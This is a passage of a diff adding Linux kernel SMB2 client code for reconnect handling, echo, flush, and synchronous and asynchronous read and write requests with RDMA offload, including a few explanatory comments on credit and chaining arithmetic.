++			rc = -ENOMEM;
++			goto cnotify_exit;
++		} else if (plen)
++			*plen = le32_to_cpu(smb_rsp->OutputBufferLength);
++	}
++
++ cnotify_exit:
++	if (rqst.rq_iov)
++		cifs_small_buf_release(rqst.rq_iov[0].iov_base); /* request */
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++/*
++ * This is a no-op for now. We're not really interested in the reply, but
++ * rather in the fact that the server sent one and that server->lstrp
++ * gets updated.
++ *
++ * FIXME: maybe we should consider checking that the reply matches the request?
++ */
++static void
++smb2_echo_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->callback_data;
++	struct smb2_echo_rsp *rsp = (struct smb2_echo_rsp *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++
++	if (mid->mid_state == MID_RESPONSE_RECEIVED
++	    || mid->mid_state == MID_RESPONSE_MALFORMED) {
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++	}
++
++	release_mid(mid);
++	add_credits(server, &credits, CIFS_ECHO_OP);
++}
++
++void smb2_reconnect_server(struct work_struct *work)
++{
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, reconnect.work);
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses, *ses2;
++	struct cifs_tcon *tcon, *tcon2;
++	struct list_head tmp_list, tmp_ses_list;
++	bool tcon_exist = false, ses_exist = false;
++	bool tcon_selected = false;
++	int rc;
++	bool resched = false;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* Prevent simultaneous reconnects that can corrupt tcon->rlist list */
++	mutex_lock(&pserver->reconnect_mutex);
++
++	INIT_LIST_HEAD(&tmp_list);
++	INIT_LIST_HEAD(&tmp_ses_list);
++	cifs_dbg(FYI, "Reconnecting tcons and channels\n");
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++
++		tcon_selected = false;
++
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->need_reconnect || tcon->need_reopen_files) {
++				tcon->tc_count++;
++				list_add_tail(&tcon->rlist, &tmp_list);
++				tcon_selected = tcon_exist = true;
++			}
++		}
++		/*
++		 * IPC has the same lifetime as its session and uses its
++		 * refcount.
++		 */
++		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
++			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
++			tcon_selected = tcon_exist = true;
++			ses->ses_count++;
++		}
++		/*
++		 * handle the case where channel needs to reconnect
++		 * binding session, but tcon is healthy (some other channel
++		 * is active)
++		 */
++		spin_lock(&ses->chan_lock);
++		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
++			list_add_tail(&ses->rlist, &tmp_ses_list);
++			ses_exist = true;
++			ses->ses_count++;
++		}
++		spin_unlock(&ses->chan_lock);
++	}
++	/*
++	 * Get the reference to server struct to be sure that the last call of
++	 * cifs_put_tcon() in the loop below won't release the server pointer.
++	 */
++	if (tcon_exist || ses_exist)
++		server->srv_count++;
++
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	list_for_each_entry_safe(tcon, tcon2, &tmp_list, rlist) {
++		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
++		if (!rc)
++			cifs_reopen_persistent_handles(tcon);
++		else
++			resched = true;
++		list_del_init(&tcon->rlist);
++		if (tcon->ipc)
++			cifs_put_smb_ses(tcon->ses);
++		else
++			cifs_put_tcon(tcon);
++	}
++
++	if (!ses_exist)
++		goto done;
++
++	/* allocate a dummy tcon struct used for reconnect */
++	tcon = tconInfoAlloc();
++	if (!tcon) {
++		resched = true;
++		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
++			list_del_init(&ses->rlist);
++			cifs_put_smb_ses(ses);
++		}
++		goto done;
++	}
++
++	tcon->status = TID_GOOD;
++	tcon->retry = false;
++	tcon->need_reconnect = false;
++
++	/* now reconnect sessions for necessary channels */
++	list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
++		tcon->ses = ses;
++		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
++		if (rc)
++			resched = true;
++		list_del_init(&ses->rlist);
++		cifs_put_smb_ses(ses);
++	}
++	tconInfoFree(tcon);
++
++done:
++	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
++	if (resched)
++		queue_delayed_work(cifsiod_wq, &server->reconnect, 2 * HZ);
++	mutex_unlock(&pserver->reconnect_mutex);
++
++	/* now we can safely release srv struct */
++	if (tcon_exist || ses_exist)
++		cifs_put_tcp_session(server, 1);
++}
++
++int
++SMB2_echo(struct TCP_Server_Info *server)
++{
++	struct smb2_echo_req *req;
++	int rc = 0;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 1 };
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "In echo request for conn_id %lld\n", server->conn_id);
++
++	spin_lock(&server->srv_lock);
++	if (server->ops->need_neg &&
++	    server->ops->need_neg(server)) {
++		spin_unlock(&server->srv_lock);
++		/* No need to send echo on newly established connections */
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++		return rc;
++	}
++	spin_unlock(&server->srv_lock);
++
++	rc = smb2_plain_req_init(SMB2_ECHO, NULL, server,
++				 (void **)&req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.CreditRequest = cpu_to_le16(1);
++
++	iov[0].iov_len = total_len;
++	iov[0].iov_base = (char *)req;
++
++	rc = cifs_call_async(server, &rqst, NULL, smb2_echo_callback, NULL,
++			     server, CIFS_ECHO_OP, NULL);
++	if (rc)
++		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
++
++	cifs_small_buf_release(req);
++	return rc;
++}
++
++void
++SMB2_flush_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++int
++SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
++		struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		u64 persistent_fid, u64 volatile_fid)
++{
++	struct smb2_flush_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_FLUSH, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++int
++SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	   u64 volatile_fid)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct smb_rqst rqst;
++	struct kvec iov[1];
++	struct kvec rsp_iov = {NULL, 0};
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int resp_buftype = CIFS_NO_BUFFER;
++	int flags = 0;
++	int rc = 0;
++
++	cifs_dbg(FYI, "flush\n");
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_flush_init(xid, &rqst, tcon, server,
++			     persistent_fid, volatile_fid);
++	if (rc)
++		goto flush_exit;
++
++	trace_smb3_flush_enter(xid, persistent_fid, tcon->tid, ses->Suid);
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_FLUSH_HE);
++		trace_smb3_flush_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				     rc);
++	} else
++		trace_smb3_flush_done(xid, persistent_fid, tcon->tid,
++				      ses->Suid);
++
++ flush_exit:
++	SMB2_flush_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
++/*
++ * To form a chain of read requests, any read requests after the first should
++ * have the end_of_chain boolean set to true.
++ */
++static int
++smb2_new_read_req(void **buf, unsigned int *total_len,
++	struct cifs_io_parms *io_parms, struct cifs_readdata *rdata,
++	unsigned int remaining_bytes, int request_type)
++{
++	int rc = -EACCES;
++	struct smb2_read_req *req = NULL;
++	struct smb2_hdr *shdr;
++	struct TCP_Server_Info *server = io_parms->server;
++
++	rc = smb2_plain_req_init(SMB2_READ, io_parms->tcon, server,
++				 (void **) &req, total_len);
++	if (rc)
++		return rc;
++
++	if (server == NULL)
++		return -ECONNABORTED;
++
++	shdr = &req->hdr;
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->ReadChannelInfoOffset = 0; /* reserved */
++	req->ReadChannelInfoLength = 0; /* reserved */
++	req->Channel = 0; /* reserved */
++	req->MinimumCount = 0;
++	req->Length = cpu_to_le32(io_parms->length);
++	req->Offset = cpu_to_le64(io_parms->offset);
++
++	trace_smb3_read_enter(0 /* xid */,
++			io_parms->persistent_fid,
++			io_parms->tcon->tid, io_parms->tcon->ses->Suid,
++			io_parms->offset, io_parms->length);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If we want to do a RDMA write, fill in and append
++	 * smbd_buffer_descriptor_v1 to the end of read request
++	 */
++	if (smb3_use_rdma_offload(io_parms)) {
++		struct smbd_buffer_descriptor_v1 *v1;
++		bool need_invalidate = server->dialect == SMB30_PROT_ID;
++
++		rdata->mr = smbd_register_mr(
++				server->smbd_conn, rdata->pages,
++				rdata->nr_pages, rdata->page_offset,
++				rdata->tailsz, true, need_invalidate);
++		if (!rdata->mr)
++			return -EAGAIN;
++
++		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
++		if (need_invalidate)
++			req->Channel = SMB2_CHANNEL_RDMA_V1;
++		req->ReadChannelInfoOffset =
++			cpu_to_le16(offsetof(struct smb2_read_req, Buffer));
++		req->ReadChannelInfoLength =
++			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
++		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
++		v1->offset = cpu_to_le64(rdata->mr->mr->iova);
++		v1->token = cpu_to_le32(rdata->mr->mr->rkey);
++		v1->length = cpu_to_le32(rdata->mr->mr->length);
++
++		*total_len += sizeof(*v1) - 1;
++	}
++#endif
++	if (request_type & CHAINED_REQUEST) {
++		if (!(request_type & END_OF_CHAIN)) {
++			/* next 8-byte aligned request */
++			*total_len = ALIGN(*total_len, 8);
++			shdr->NextCommand = cpu_to_le32(*total_len);
++		} else /* END_OF_CHAIN */
++			shdr->NextCommand = 0;
++		if (request_type & RELATED_REQUEST) {
++			shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
++			/*
++			 * Related requests use info from previous read request
++			 * in chain.
++			 */
++			shdr->SessionId = cpu_to_le64(0xFFFFFFFFFFFFFFFF);
++			shdr->Id.SyncId.TreeId = cpu_to_le32(0xFFFFFFFF);
++			req->PersistentFileId = (u64)-1;
++			req->VolatileFileId = (u64)-1;
++		}
++	}
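++	/*
++	 * Sketch of the compounding convention handled above (hypothetical
++	 * three-request chain): requests 1 and 2 carry NextCommand =
++	 * ALIGN(their own length, 8) so the server can walk the chain, the
++	 * final request carries NextCommand = 0, and a RELATED_REQUEST
++	 * uses all-0xFF SessionId, TreeId and file ids so the server
++	 * substitutes the values produced by the previous command in the
++	 * chain.
++	 */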
++	if (remaining_bytes > io_parms->length)
++		req->RemainingBytes = cpu_to_le32(remaining_bytes);
++	else
++		req->RemainingBytes = 0;
++
++	*buf = req;
++	return rc;
++}
++
++static void
++smb2_readv_callback(struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct TCP_Server_Info *server = rdata->server;
++	struct smb2_hdr *shdr =
++				(struct smb2_hdr *)rdata->iov[0].iov_base;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
++				 .rq_nvec = 1, };
++
++	if (rdata->got_bytes) {
++		rqst.rq_pages = rdata->pages;
++		rqst.rq_offset = rdata->page_offset;
++		rqst.rq_npages = rdata->nr_pages;
++		rqst.rq_pagesz = rdata->pagesz;
++		rqst.rq_tailsz = rdata->tailsz;
++	}
++
++	WARN_ONCE(rdata->server != mid->server,
++		  "rdata server %p != mid server %p",
++		  rdata->server, mid->server);
++
++	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
++		 __func__, mid->mid, mid->mid_state, rdata->result,
++		 rdata->bytes);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		credits.value = le16_to_cpu(shdr->CreditRequest);
++		credits.instance = server->reconnect_instance;
++		/* result already set, check signature */
++		if (server->sign && !mid->decrypted) {
++			int rc;
++
++			rc = smb2_verify_signature(&rqst, server);
++			if (rc)
++				cifs_tcon_dbg(VFS, "SMB signature verification returned error = %d\n",
++					 rc);
++		}
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		rdata->result = -EAGAIN;
++		if (server->sign && rdata->got_bytes)
++			/* reset byte count since we cannot check the signature */
++			rdata->got_bytes = 0;
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_RESPONSE_MALFORMED:
++		credits.value = le16_to_cpu(shdr->CreditRequest);
++		credits.instance = server->reconnect_instance;
++		fallthrough;
++	default:
++		rdata->result = -EIO;
++	}
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If this rdata has a memory registration, the MR can be freed.
++	 * The MR needs to be freed as soon as I/O finishes to prevent
++	 * deadlock, because MRs are limited in number and are reused for
++	 * future I/Os
++	 */
++	if (rdata->mr) {
++		smbd_deregister_mr(rdata->mr);
++		rdata->mr = NULL;
++	}
++#endif
++	if (rdata->result && rdata->result != -ENODATA) {
++		cifs_stats_fail_inc(tcon, SMB2_READ_HE);
++		trace_smb3_read_err(0 /* xid */,
++				    rdata->cfile->fid.persistent_fid,
++				    tcon->tid, tcon->ses->Suid, rdata->offset,
++				    rdata->bytes, rdata->result);
++	} else
++		trace_smb3_read_done(0 /* xid */,
++				     rdata->cfile->fid.persistent_fid,
++				     tcon->tid, tcon->ses->Suid,
++				     rdata->offset, rdata->got_bytes);
++
++	queue_work(cifsiod_wq, &rdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* smb2_async_readv - send an async read, and set up mid to handle result */
++int
++smb2_async_readv(struct cifs_readdata *rdata)
++{
++	int rc, flags = 0;
++	char *buf;
++	struct smb2_hdr *shdr;
++	struct cifs_io_parms io_parms;
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 1 };
++	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
++		 __func__, rdata->offset, rdata->bytes);
++
++	if (!rdata->server)
++		rdata->server = cifs_pick_channel(tcon->ses);
++
++	io_parms.tcon = tlink_tcon(rdata->cfile->tlink);
++	io_parms.server = server = rdata->server;
++	io_parms.offset = rdata->offset;
++	io_parms.length = rdata->bytes;
++	io_parms.persistent_fid = rdata->cfile->fid.persistent_fid;
++	io_parms.volatile_fid = rdata->cfile->fid.volatile_fid;
++	io_parms.pid = rdata->pid;
++
++	rc = smb2_new_read_req(
++		(void **) &buf, &total_len, &io_parms, rdata, 0, 0);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms.tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = total_len;
++
++	shdr = (struct smb2_hdr *)buf;
++
++	if (rdata->credits.value > 0) {
++		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
++						SMB2_MAX_BUFFER_SIZE));
++		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
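++		/*
++		 * Example with assumed sizes: a 1 MiB read gives
++		 * CreditCharge = DIV_ROUND_UP(1048576, 65536) = 16 and a
++		 * CreditRequest of 16 + 8 = 24, asking the server to grant
++		 * a few credits beyond what this request consumes.
++		 */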
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++		if (rc)
++			goto async_readv_out;
++
++		flags |= CIFS_HAS_CREDITS;
++	}
++
++	kref_get(&rdata->refcount);
++	rc = cifs_call_async(server, &rqst,
++			     cifs_readv_receive, smb2_readv_callback,
++			     smb3_handle_read_data, rdata, flags,
++			     &rdata->credits);
++	if (rc) {
++		kref_put(&rdata->refcount, cifs_readdata_release);
++		cifs_stats_fail_inc(io_parms.tcon, SMB2_READ_HE);
++		trace_smb3_read_err(0 /* xid */, io_parms.persistent_fid,
++				    io_parms.tcon->tid,
++				    io_parms.tcon->ses->Suid,
++				    io_parms.offset, io_parms.length, rc);
++	}
++
++async_readv_out:
++	cifs_small_buf_release(buf);
++	return rc;
++}
++
++int
++SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
++	  unsigned int *nbytes, char **buf, int *buf_type)
++{
++	struct smb_rqst rqst;
++	int resp_buftype, rc;
++	struct smb2_read_req *req = NULL;
++	struct smb2_read_rsp *rsp = NULL;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	unsigned int total_len;
++	int flags = CIFS_LOG_ERROR;
++	struct cifs_ses *ses = io_parms->tcon->ses;
++
++	if (!io_parms->server)
++		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
++
++	*nbytes = 0;
++	rc = smb2_new_read_req((void **)&req, &total_len, io_parms, NULL, 0, 0);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms->tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, io_parms->server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_read_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		if (rc != -ENODATA) {
++			cifs_stats_fail_inc(io_parms->tcon, SMB2_READ_HE);
++			cifs_dbg(VFS, "Send error in read = %d\n", rc);
++			trace_smb3_read_err(xid,
++					    req->PersistentFileId,
++					    io_parms->tcon->tid, ses->Suid,
++					    io_parms->offset, io_parms->length,
++					    rc);
++		} else
++			trace_smb3_read_done(xid, req->PersistentFileId, io_parms->tcon->tid,
++					     ses->Suid, io_parms->offset, 0);
++		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++		cifs_small_buf_release(req);
++		return rc == -ENODATA ? 0 : rc;
++	} else
++		trace_smb3_read_done(xid,
++				    req->PersistentFileId,
++				    io_parms->tcon->tid, ses->Suid,
++				    io_parms->offset, io_parms->length);
++
++	cifs_small_buf_release(req);
++
++	*nbytes = le32_to_cpu(rsp->DataLength);
++	if ((*nbytes > CIFS_MAX_MSGSIZE) ||
++	    (*nbytes > io_parms->length)) {
++		cifs_dbg(FYI, "bad length %d for count %d\n",
++			 *nbytes, io_parms->length);
++		rc = -EIO;
++		*nbytes = 0;
++	}
++
++	if (*buf) {
++		memcpy(*buf, (char *)rsp + rsp->DataOffset, *nbytes);
++		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	} else if (resp_buftype != CIFS_NO_BUFFER) {
++		*buf = rsp_iov.iov_base;
++		if (resp_buftype == CIFS_SMALL_BUFFER)
++			*buf_type = CIFS_SMALL_BUFFER;
++		else if (resp_buftype == CIFS_LARGE_BUFFER)
++			*buf_type = CIFS_LARGE_BUFFER;
++	}
++	return rc;
++}
++
++/*
++ * Check the mid_state and signature on received buffer (if any), and queue the
++ * workqueue completion task.
++ */
++static void
++smb2_writev_callback(struct mid_q_entry *mid)
++{
++	struct cifs_writedata *wdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct TCP_Server_Info *server = wdata->server;
++	unsigned int written;
++	struct smb2_write_rsp *rsp = (struct smb2_write_rsp *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++
++	WARN_ONCE(wdata->server != mid->server,
++		  "wdata server %p != mid server %p",
++		  wdata->server, mid->server);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++		wdata->result = smb2_check_receive(mid, server, 0);
++		if (wdata->result != 0)
++			break;
++
++		written = le32_to_cpu(rsp->DataLength);
++		/*
++		 * Mask off the high 16 bits when the count of bytes
++		 * written, as returned by the server, is greater than the
++		 * count of bytes requested by the client. OS/2 servers are
++		 * known to set incorrect CountHigh values.
++		 */
++		if (written > wdata->bytes)
++			written &= 0xFFFF;
++
++		if (written < wdata->bytes)
++			wdata->result = -ENOSPC;
++		else
++			wdata->bytes = written;
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		wdata->result = -EAGAIN;
++		break;
++	case MID_RESPONSE_MALFORMED:
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++		fallthrough;
++	default:
++		wdata->result = -EIO;
++		break;
++	}
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If this wdata has a memory registration, the MR can be freed.
++	 * The number of MRs available is limited, so it is important to
++	 * recover a used MR as soon as the I/O is finished. Holding an MR
++	 * longer into the I/O process can result in I/O deadlock due to a
++	 * lack of MRs available to send a request on I/O retry
++	 */
++	if (wdata->mr) {
++		smbd_deregister_mr(wdata->mr);
++		wdata->mr = NULL;
++	}
++#endif
++	if (wdata->result) {
++		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
++		trace_smb3_write_err(0 /* no xid */,
++				     wdata->cfile->fid.persistent_fid,
++				     tcon->tid, tcon->ses->Suid, wdata->offset,
++				     wdata->bytes, wdata->result);
++		if (wdata->result == -ENOSPC)
++			pr_warn_once("Out of space writing to %s\n",
++				     tcon->tree_name);
++	} else
++		trace_smb3_write_done(0 /* no xid */,
++				      wdata->cfile->fid.persistent_fid,
++				      tcon->tid, tcon->ses->Suid,
++				      wdata->offset, wdata->bytes);
++
++	queue_work(cifsiod_wq, &wdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* smb2_async_writev - send an async write, and set up mid to handle result */
++int
++smb2_async_writev(struct cifs_writedata *wdata,
++		  void (*release)(struct kref *kref))
++{
++	int rc = -EACCES, flags = 0;
++	struct smb2_write_req *req = NULL;
++	struct smb2_hdr *shdr;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct TCP_Server_Info *server = wdata->server;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { };
++	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
++
++	if (!wdata->server)
++		server = wdata->server = cifs_pick_channel(tcon->ses);
++
++	/*
++	 * In the future we may get cifs_io_parms passed in from the
++	 * caller, but for now we construct it here...
++	 */
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
++	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	shdr = (struct smb2_hdr *)req;
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->WriteChannelInfoOffset = 0;
++	req->WriteChannelInfoLength = 0;
++	req->Channel = 0;
++	req->Offset = cpu_to_le64(io_parms->offset);
++	req->DataOffset = cpu_to_le16(
++				offsetof(struct smb2_write_req, Buffer));
++	req->RemainingBytes = 0;
++
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If we want to do a server RDMA read, fill in and append
++	 * smbd_buffer_descriptor_v1 to the end of write request
++	 */
++	if (smb3_use_rdma_offload(io_parms)) {
++		struct smbd_buffer_descriptor_v1 *v1;
++		bool need_invalidate = server->dialect == SMB30_PROT_ID;
++
++		wdata->mr = smbd_register_mr(
++				server->smbd_conn, wdata->pages,
++				wdata->nr_pages, wdata->page_offset,
++				wdata->tailsz, false, need_invalidate);
++		if (!wdata->mr) {
++			rc = -EAGAIN;
++			goto async_writev_out;
++		}
++		req->Length = 0;
++		req->DataOffset = 0;
++		if (wdata->nr_pages > 1)
++			req->RemainingBytes =
++				cpu_to_le32(
++					(wdata->nr_pages - 1) * wdata->pagesz -
++					wdata->page_offset + wdata->tailsz
++				);
++		else
++			req->RemainingBytes = cpu_to_le32(wdata->tailsz);
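++		/*
++		 * Illustrative arithmetic for the RemainingBytes above
++		 * (made-up layout): nr_pages = 3, pagesz = 4096,
++		 * page_offset = 100 and tailsz = 500 describe
++		 * (3 - 1) * 4096 - 100 + 500 = 8592 bytes of payload for
++		 * the server to fetch via RDMA read.
++		 */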
++		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
++		if (need_invalidate)
++			req->Channel = SMB2_CHANNEL_RDMA_V1;
++		req->WriteChannelInfoOffset =
++			cpu_to_le16(offsetof(struct smb2_write_req, Buffer));
++		req->WriteChannelInfoLength =
++			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
++		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
++		v1->offset = cpu_to_le64(wdata->mr->mr->iova);
++		v1->token = cpu_to_le32(wdata->mr->mr->rkey);
++		v1->length = cpu_to_le32(wdata->mr->mr->length);
++	}
++#endif
++	iov[0].iov_len = total_len - 1;
++	iov[0].iov_base = (char *)req;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++	rqst.rq_pages = wdata->pages;
++	rqst.rq_offset = wdata->page_offset;
++	rqst.rq_npages = wdata->nr_pages;
++	rqst.rq_pagesz = wdata->pagesz;
++	rqst.rq_tailsz = wdata->tailsz;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (wdata->mr) {
++		iov[0].iov_len += sizeof(struct smbd_buffer_descriptor_v1);
++		rqst.rq_npages = 0;
++	}
++#endif
++	cifs_dbg(FYI, "async write at %llu %u bytes\n",
++		 io_parms->offset, io_parms->length);
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/* For RDMA read, I/O size is in RemainingBytes not in Length */
++	if (!wdata->mr)
++		req->Length = cpu_to_le32(io_parms->length);
++#else
++	req->Length = cpu_to_le32(io_parms->length);
++#endif
++
++	if (wdata->credits.value > 0) {
++		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
++						    SMB2_MAX_BUFFER_SIZE));
++		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
++		if (rc)
++			goto async_writev_out;
++
++		flags |= CIFS_HAS_CREDITS;
++	}
++
++	kref_get(&wdata->refcount);
++	rc = cifs_call_async(server, &rqst, NULL, smb2_writev_callback, NULL,
++			     wdata, flags, &wdata->credits);
++
++	if (rc) {
++		trace_smb3_write_err(0 /* no xid */,
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
++		kref_put(&wdata->refcount, release);
++		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
++	}
++
++async_writev_out:
++	cifs_small_buf_release(req);
++	return rc;
++}
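
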